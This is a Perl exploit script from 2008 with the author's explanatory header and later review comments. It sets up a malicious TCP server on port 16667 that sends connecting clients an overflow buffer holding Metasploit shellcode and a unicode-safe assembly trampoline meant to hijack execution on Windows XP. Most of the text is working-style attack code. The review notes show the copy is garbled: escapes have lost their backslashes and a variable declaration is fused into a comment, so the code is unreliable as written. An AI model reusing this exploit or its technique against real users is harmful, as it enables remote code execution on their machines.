# k`sOSe - 08/24/2008
# This is useless, non-portable exploit code, tested only on my winxp-sp3 VM.
# I was looking for a vuln to write an exploit for when I found this PoC:
#
# http://www.milw0rm.com/exploits/5817
#
# The author wrote:
# "The reason why there isnt any shellcode here is because the client is
# coverting the junk/buffer data to unicode so its corrupting the shellcode,
# ive tried sending unicode buffer but the same problem occurs.
# if anyone else can get further please let me know. but i doubt you can"
#
# It is for this reason, a small suggestion of impossibility (copyright Phantasmal Phantasmagoria),
# that I decided to write this. Actually it was pretty funny :)
#
# The first problem is how to redirect the execution flow to our buffer; the buffer can be found
# at three different locations:
# - at some address on the stack converted to unicode
# - at some address on the heap again converted to unicode
# - at some address on the heap in plain ASCII
#
# Unfortunately none of these addresses are unicode friendly :(.
# But.. there is an address on the stack that points into the middle of the buffer (the one on the
# stack); all we need is to pop the stack 6 times and then return.
# To achieve this we return 2 times on a unicode friendly pop,pop,pop,ret.
#
# The second problem is that the buffer on the stack is converted to unicode (so \x41 -> \x00\x41)
# *and* must be, with some exceptions, in the \x01 -> \x59 space... so I decided to write a
# unicode friendly ASM stub that will load the address of the ASCII version of the buffer in EAX
# using offsets from a register(somewhat related to our buffer), push it and then return.
#
# On my box this works 100 times out of 100 :) use warnings;
use strict;
# NOTE(review): the `use warnings;` that belonged here was fused into the last
# header comment line by extraction, so this copy runs without warnings enabled.
#
# Whole script: bind a TCP listener and send one crafted line to every client
# that connects. From a defender's view the only network behaviour is the bind
# on TCP/16667 and a single line (about 1 KiB if the escapes were bytes) sent to
# each client; the exposed surface is a client that connects to an untrusted
# server and accepts an over-long line.
#
# NOTE(review): in this copy every "\x.." escape has lost its backslash, so the
# string literals below are plain ASCII text ("x41" is the three characters
# x, 4, 1), not the byte values the trailing comments describe.
#
# NOTE(review): the constructor's return value is not checked; if the port
# cannot be bound, $sock is undef and the accept() call at the bottom dies.
use IO::Socket; my $sock = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '16667', Listen => SOMAXCONN, Reuse => 1 ); my $ret = "xa2x41" ; # $ret: the address the header calls a unicode-friendly pop,pop,pop,ret (escapes garbled in this copy); the literal that follows is the metasploit-generated shellcode
# Shellcode body. The author says it is metasploit-generated; what it does when
# executed is not stated anywhere on this page.
my $shellcode =
"x50x59x49x49x49x49x49x49x49x49x49x49x51x5a" .
"x56x54x58x33x30x56x58x34x41x50x30x41x33x48" .
"x48x30x41x30x30x41x42x41x41x42x54x41x41x51" .
"x32x41x42x32x42x42x30x42x42x58x50x38x41x43" .
"x4ax4ax49x4bx4cx4bx58x50x44x45x50x45x50x45" .
"x50x4cx4bx47x35x47x4cx4cx4bx43x4cx45x55x44" .
"x38x45x51x4ax4fx4cx4bx50x4fx45x48x4cx4bx51" .
"x4fx47x50x43x31x4ax4bx47x39x4cx4bx50x34x4c" .
"x4bx43x31x4ax4ex46x51x49x50x4cx59x4ex4cx4b" .
"x34x49x50x42x54x44x47x49x51x48x4ax44x4dx43" .
"x31x49x52x4ax4bx4cx34x47x4bx46x34x46x44x44" .
"x44x43x45x4ax45x4cx4bx51x4fx51x34x43x31x4a" .
"x4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4fx45" .
"x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45x51x4a" .
"x4bx4dx59x51x4cx47x54x44x44x48x43x51x4fx50" .
"x31x4cx36x45x30x50x56x42x44x4cx4bx47x36x46" .
"x50x4cx4bx51x50x44x4cx4cx4bx44x30x45x4cx4e" .
"x4dx4cx4bx43x58x45x58x4cx49x4cx38x4bx33x49" .
"x50x43x5ax46x30x45x38x4cx30x4dx5ax44x44x51" .
"x4fx42x48x4cx58x4bx4ex4cx4ax44x4ex51x47x4b" .
"x4fx4ax47x47x33x47x4ax51x4cx50x57x50x49x50" .
"x4ex50x44x50x4fx46x37x46x33x51x4cx42x53x42" .
"x59x44x33x44x34x43x55x42x4dx47x43x50x32x51" .
"x4cx43x53x45x31x42x4cx45x33x46x4ex45x35x42" .
"x58x45x35x43x30x45x5ax41x41";
# Black magic unicode friendly ASM stub that will load the shellcode address
# using offsets from a register that points near the shellcode.
# The trailing comments are the author's mnemonics for each single-byte entry.
# NOTE(review): the interleaved "x42" entries carry no comment in the original
# and their role is not explained on this page.
my $trampoline = "x52" . # push edx
"x42" .
"x58" . # pop eax
"x42" .
"x55" . # push ebp
"x42" .
"x44" . # inc esp
"x42" .
"x44" . # inc esp
"x42" .
"x59" . # pop ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x41" . # inc ecx
"x42" .
"x51" . # push ecx
"x42" .
"x4c" . # dec esp
"x42" .
"x59" . # pop ecx
"xec" . # add ah,ch
"x42" .
"x50" . # push eax
"x42" .
"x5e" . # pop esi
"x42" .
"x51" . # push ecx
"x42" .
"x44" . # inc esp
"x42" .
"x58" . # pop eax
"x42" .
"x54" . # push esp
"x42" .
"x5b" . # pop ebx
"x42" .
"x56" . # push esi
"x42" .
"x4B" . # dec ebx
"x42" .
"x4B" . # dec ebx
"x42" .
"x4b" . # dec ebx
"x42" .
"x4b" . # dec ebx
"x42" .
"x48" . # dec eax
"x42" .
"x48" . # dec eax
"x42" .
"x48" . # dec eax
"x42" .
"x48" . # dec eax
"x03" . # ADD BYTE PTR DS:[EBX],AL
"x03" . # ADD BYTE PTR DS:[EBX],AL
"x03" . # ADD BYTE PTR DS:[EBX],AL
"x03" . # ADD BYTE PTR DS:[EBX],AL
"x42" .
"x58" . # pop eax
"x42" .
"x44" . # inc esp // realign stack pointer
"x42" .
"x44" . # inc esp // realign stack pointer
"x42" .
"x50" . # push eax
"x42" .
"xc3" ; # ret -- NOTE(review): the text "my $buf2 = $shellcode ." that opened the buffer assembly was fused into this comment by extraction; the expression on the next lines is therefore a bare statement and $buf2 is never declared, so `use strict` rejects this copy.
# Buffer layout, in the author's sizes: shellcode, "A" padding up to 784 bytes,
# the ASM stub, 158 bytes of "b", $ret, 6 bytes of "A", $ret again. The `x`
# repetition operator binds tighter than `.`, so each "... x N" is one segment.
"x41" x (784-length($shellcode)) . # pad the shellcode segment to 784
$trampoline .
"x62" x 158 . # filler between the stub and the first return address
$ret .
"x41" x 6 . # the 6 stack slots the header says are popped before returning
$ret; while(my $client = $sock->accept()) { # accept loop: every client that connects gets the same line; no peer filtering
print $client "$buf2rn"; # NOTE(review): "$buf2rn" interpolates a variable named $buf2rn, which is not declared (the line-terminator escapes were lost along with the others); the print is unchecked and $client is closed implicitly when it goes out of scope
}